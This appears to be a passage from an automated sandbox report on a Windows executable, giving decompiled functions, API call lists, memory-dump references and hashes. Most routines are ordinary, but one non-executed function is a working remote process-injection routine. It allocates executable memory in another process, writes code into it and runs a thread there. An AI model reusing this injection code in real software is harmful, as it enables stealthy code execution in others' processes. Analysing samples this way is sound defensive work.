Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88

Uniqueness

Uniqueness Score: -1.00%

Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}

APIs

malloc.MSVCRT ref: 0040496D
memcpy.MSVCRT ref: 00404985
free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

Strings

W@, xrefs: 0040495B

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: freemallocmemcpy
String ID: W@
API String ID: 3056473165-1729568415
Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}

0x0040543f
0x00405456
0x00405462
0x00405467
0x0040546d
0x00405478
0x00405489
0x0040548d
0x00000000
0x00405492
0x00405496

APIs

memset.MSVCRT ref: 00405456

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8

wcscat.MSVCRT ref: 00405478
LoadLibraryW.KERNELBASE(00000000), ref: 00405489
LoadLibraryW.KERNEL32(?), ref: 00405492

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
String ID:
API String ID: 3725422290-0
Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8

Uniqueness

Uniqueness Score: -1.00%

Function 004056B5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056B5(signed int __ecx, void* __eflags, signed int* _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short* _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* __edi;
				void* __esi;
				signed short* _t68;
				signed short _t72;
				intOrPtr _t80;
				void* _t82;
				void* _t85;
				intOrPtr _t90;
				signed int _t101;
				intOrPtr _t102;
				void** _t104;
				signed short* _t106;
				signed int* _t107;
				signed int _t110;

				_t94 = __ecx;
				_t101 = 0;
				_v32 = 0x22;
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 1;
				_v8 = 0;
				_v48 = 0;
				_v36 = 0;
				_v44 = 0;
				_v40 = 0x100;
				_v52 = 0;
				_t68 = E004054B9(_a4);
				_t106 = _a8;
				if( *_t106 == 0) {
					L31:
					_t107 = _a4;
					L32:
					_t102 =  *((intOrPtr*)(_t107 + 0x1c));
					 *((intOrPtr*)(_t107 + 0x30)) = _t102;
					E004055D1(_t68,  &_v52);
					return _t102;
				}
				_v28 = _t106;
				do {
					_t72 =  *_v28 & 0x0000ffff;
					if(_t72 != 0x20 || _v8 != 0) {
						if(_t72 == 0x22 || _t72 == 0x27) {
							if(_v8 != 0) {
								if(_t72 != _v32) {
									goto L14;
								}
								_v8 = _v8 ^ 0x00000001;
								goto L25;
							}
							_v32 = _t72 & 0x0000ffff;
							_v8 = 1;
							goto L25;
						} else {
							L14:
							if(_t101 != 0) {
								L24:
								E0040559A( &_v52, _t101);
								 *((short*)(_v36 + _t101 * 2)) =  *_v28 & 0x0000ffff;
								_t106 = _a8;
								_t101 = _t101 + 1;
								_v12 = _t101;
								L25:
								_v24 = 0;
								goto L26;
							}
							if(_t72 == 0x20) {
								goto L25;
							}
							_t104 = _a4 + 0x20;
							if(_v16 >= 0) {
								_t110 = _v16;
								_t82 = _t104[2];
								if(_t110 != 0xffffffff) {
									E00404951( &(_t104[1]), _t110, _t104, 4, _t82);
								} else {
									free( *_t104);
								}
								_t85 = _t110 + 1;
								if(_t104[3] < _t85) {
									_t104[3] = _t85;
								}
								_t94 = _v20;
								 *((intOrPtr*)( *_t104 + _t110 * 4)) = _v20;
							}
							_t101 = _v12;
							goto L24;
						}
					} else {
						if(_v24 == 0) {
							E0040559A( &_v52, _t101);
							_t90 = _v36;
							 *((short*)(_t90 + _t101 * 2)) = 0;
							if(_t90 == 0) {
								_t90 = 0x40c4e8;
							}
							E004054DF(_a4, _t94, _t90); // executed
							_v16 = _v16 + 1;
							_v24 = 1;
							_v12 = 0;
							_t101 = 0;
						}
					}
					L26:
					_v20 = _v20 + 1;
					_t68 = _t106 + _v20 * 2;
					_v28 = _t68;
				} while ( *_t68 != 0);
				if(_t101 <= 0) {
					goto L31;
				}
				E0040559A( &_v52, _t101);
				_t80 = _v36;
				 *((short*)(_t80 + _t101 * 2)) = 0;
				if(_t80 == 0) {
					_t80 = 0x40c4e8;
				}
				_t107 = _a4;
				_t68 = E004054DF(_t107, _t94, _t80);
				goto L32;
			}

0x004056b5
0x004056c3
0x004056c5
0x004056cc
0x004056cf
0x004056d2
0x004056d5
0x004056dc
0x004056df
0x004056e2
0x004056e5
0x004056e8
0x004056ef
0x004056f2
0x004056f7
0x004056fd
0x00405832
0x00405832
0x00405835
0x00405835
0x00405838
0x0040583e
0x00405849
0x00405849
0x00405703
0x00405706
0x00405709
0x00405710
0x0040575b
0x00405766
0x0040577b
0x00000000
0x00000000
0x0040577d
0x00000000
0x0040577d
0x0040576b
0x0040576e
0x00000000
0x00405783
0x00405783
0x00405785
0x004057d1
0x004057dc
0x004057e4
0x004057e8
0x004057eb
0x004057ec
0x004057ef
0x004057ef
0x00000000
0x004057ef
0x0040578b
0x00000000
0x00000000
0x00405790
0x00405796
0x00405798
0x0040579e
0x004057a1
0x004057b4
0x004057a3
0x004057a5
0x004057a5
0x004057ba
0x004057c1
0x004057c3
0x004057c3
0x004057c8
0x004057cb
0x004057cb
0x004057ce
0x00000000
0x004057ce
0x00405717
0x0040571a
0x00405725
0x0040572a
0x0040572f
0x00405733
0x00405735
0x00405735
0x0040573e
0x00405743
0x00405746
0x0040574d
0x00405750
0x00405750
0x0040571a
0x004057f2
0x004057f2
0x004057f8
0x004057fe
0x004057fe
0x00405809
0x00000000
0x00000000
0x00405810
0x00405815
0x0040581a
0x0040581e
0x00405820
0x00405820
0x00405825
0x0040582b
0x00000000

APIs

Part of subcall function 004054B9: free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
Part of subcall function 004054B9: free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4

Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA

free.MSVCRT(?,00000000,?,00000000), ref: 004057A5

Strings

", xrefs: 004056C5

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID: "
API String ID: 1294909896-123907689
Opcode ID: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
Instruction ID: 1409d80bf75a77decaa3a1a55a0e2bac06d52b88a1a49f7bf6fe6aa810a6aee9
Opcode Fuzzy Hash: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
Instruction Fuzzy Hash: 7F511675D00619EBCB20EF99C8805AEB7B5FF44314F50807BE945B7290D738AA42DF99

Uniqueness

Uniqueness Score: -1.00%

Function 004054B9, Relevance: 2.5, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054B9(intOrPtr* __esi) {

				free( *(__esi + 0x10));
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}

0x004054bc
0x004054c4
0x004054cd
0x004054cf
0x004054d2
0x004054d5
0x004054d8
0x004054db
0x004054de

APIs

free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48

Uniqueness

Uniqueness Score: -1.00%

Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}

0x00408f4c
0x00408f57
0x00408f60
0x00408f62
0x00408f67
0x00408f67
0x00408f71

APIs

Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA

FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentErrorFreeLastLibraryProcess
String ID:
API String ID: 187924719-0
Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694

Uniqueness

Uniqueness Score: -1.00%

Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}

0x004098fa
0x004098fc
0x00409901
0x00409907
0x00000000
0x0040991c
0x00409918
0x00000000

APIs

Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$FileModuleName
String ID:
API String ID: 3859505661-0
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208

Uniqueness

Uniqueness Score: -1.00%

Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}

0x004095da
0x004095da
0x004095de
0x004095e1
0x004095e7
0x004095e7
0x004095ee
0x004095fc

APIs

FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}

0x0040a3d0
0x0040a3d9

APIs

EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05

Uniqueness

Uniqueness Score: -1.00%

Function 004055D1, Relevance: 1.3, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055D1(void* __eax, signed int* __esi) {
				void* _t7;
				signed int* _t9;

				_t9 = __esi;
				_t7 = __eax;
				if(__esi[4] != 0) {
					free(__esi[4]); // executed
					__esi[4] = __esi[4] & 0x00000000;
				}
				_t9[2] = _t9[2] & 0x00000000;
				 *_t9 =  *_t9 & 0x00000000;
				return _t7;
			}

0x004055d1
0x004055d1
0x004055d5
0x004055da
0x004055df
0x004055e3
0x004055e4
0x004055e8
0x004055eb

APIs

free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
memset.MSVCRT ref: 0040A4B3
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0

Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1

GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
CloseHandle.KERNEL32(00000000), ref: 0040A648
memset.MSVCRT ref: 0040A66E
ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
FreeLibrary.KERNEL32(?), ref: 0040A6DC
GetLastError.KERNEL32 ref: 0040A6E4
GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1

Strings

kernel32.dll, xrefs: 0040A4BB
D, xrefs: 0040A528
GetLastError, xrefs: 0040A4FE
CreateProcessW, xrefs: 0040A4DD

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
String ID: CreateProcessW$D$GetLastError$kernel32.dll
API String ID: 1572607441-20550370
Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
